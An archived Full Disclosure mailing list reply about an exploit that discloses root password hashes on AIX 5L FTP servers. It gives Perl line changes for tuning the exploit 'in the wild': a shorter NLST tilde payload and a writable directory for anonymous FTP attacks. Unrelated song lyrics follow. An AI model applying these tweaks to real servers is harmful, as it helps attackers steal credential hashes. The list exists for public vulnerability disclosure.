Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
From: "HI-TECH ." <isowarez.isowarez.isowarez () googlemail com>
Date: Thu, 22 Jul 2010 18:13:47 +0200

Hello list.

Just checked: If the exploit doesn't work in the wild, try playing with the
source..

change
print $sock "NLST ~" . "A" x 5000 . "\r\n";
to
print $sock "NLST ~" . "A" x 2000 . "\r\n";

and change

print $sock "CWD pub\r\n";
to
print $sock "CWD writeable-folder-here\r\n";
for anonymous ftp attacks.

Cheers!

Kingcope

2010/7/18 HI-TECH . <isowarez.isowarez.isowarez () googlemail com>

(SEE ATTACHMENT)

---

Bad luck wind been blowin' on my back
I was born to bring trouble wherever I'm at
With the number '13' tattooed on my neck
That ink starts to itch
Black gon' turn to red

I was born in the soul of misery
And I never had me a name
They just give me a number when I was young

Got a long line of heartache
I carry it well
The list of lives I've broken
Reach from here to hell
And a bad luck wind been blowin' on my back
Pray you don't look at me
And I pray I don't look back

I was born in the soul of misery
And I never had me a name
They just give me a number when I was young

Found me with a preacherman confessin' all I done
Catch me with the devil playing 21
And a bad luck wind been blowin' on my back
I was born to bring trouble wherever I'm at

I was born in the soul of misery
And I never had me a name
They just give me a number when I was young
When I was young
When I was young
When I was young

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]